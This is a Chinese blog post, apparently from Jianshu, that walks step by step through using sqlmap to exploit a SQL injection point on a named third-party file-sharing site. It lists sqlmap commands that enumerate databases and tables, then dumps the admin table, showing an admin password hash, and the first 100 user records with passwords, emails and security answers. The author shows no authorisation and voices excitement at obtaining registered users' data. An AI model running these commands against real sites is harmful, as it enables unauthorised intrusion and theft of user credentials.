SQLMap注入拖庫

SQLMAP是一款開源的滲透測試程序,它可以自動探測和利用SQL注入漏洞來獲得我們想要的數據。我們可以利用它執行特定的命令、查看文件、獲取各種數據;當然,最猥瑣的是它利用注入點拖庫的速率還是灰常讓人滿意的。

滲透開始-->

注入點:"http://so.126disk.com/search?key=A"

測試環境:?BackTrack?5??/???SQLMAP?0.9

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dbs

//?列舉數據庫?-->?126disk?,?information_schema

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-db

//?當前數據庫?-->?126disk

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--users

//?列數據庫用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--current-user

//?當前用戶

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--tables?-D?"126disk"

//?列舉數據庫126disk的表名

獲取表名

+---------------------+

disk_admin

disk_adminlog

disk_adminmsg

disk_collection

disk_count

disk_file

disk_gonggao

disk_guolv

disk_haoyou

disk_integral

disk_integrallog

disk_jubao

disk_link

disk_links

disk_message

disk_mulu

disk_search

disk_server

disk_tag

disk_type

disk_user

disk_userlog

disk_visitors

disk_zhuanji

+----------------------+

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin的列名

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,login,pass,user"?-T?"disk_admin"?-D?"126disk"

//?獲取表disk_admin中的數據,包含列?id,login,pass,user???-->?1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--columns?-T?"disk_user"?-D?"126disk"

//?獲取表disk_user的列名

當看到這些列名時,心中是莫名的激動。里面可都是注冊用戶的數據啊

#>./sqlmap.py?-u?"http://so.126disk.com/search?key=A"?-v?1?--dump?-C?"id,name,pass,email,wenti,daan"?-T?"disk_user"?-D?"126disk"?--start?1?--stop?100

//?獲取表disk_user的前100條數據,包含id,name,pass,email,wenti,daan;這里已經開始拖庫了

SQLMAP是非常人性化的,它會將獲取的數據存儲在/pentest/web/scanners/sqlmap/output/so.126disk.com/dump/126disk/

補充:?在獲取數據的過程中會詢問是否破解HASH密碼,這里選擇n,我們不急于破解密文

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發布,文章內容僅代表作者本人觀點,簡書系信息發布平臺,僅提供信息存儲服務。

推薦閱讀更多精彩內容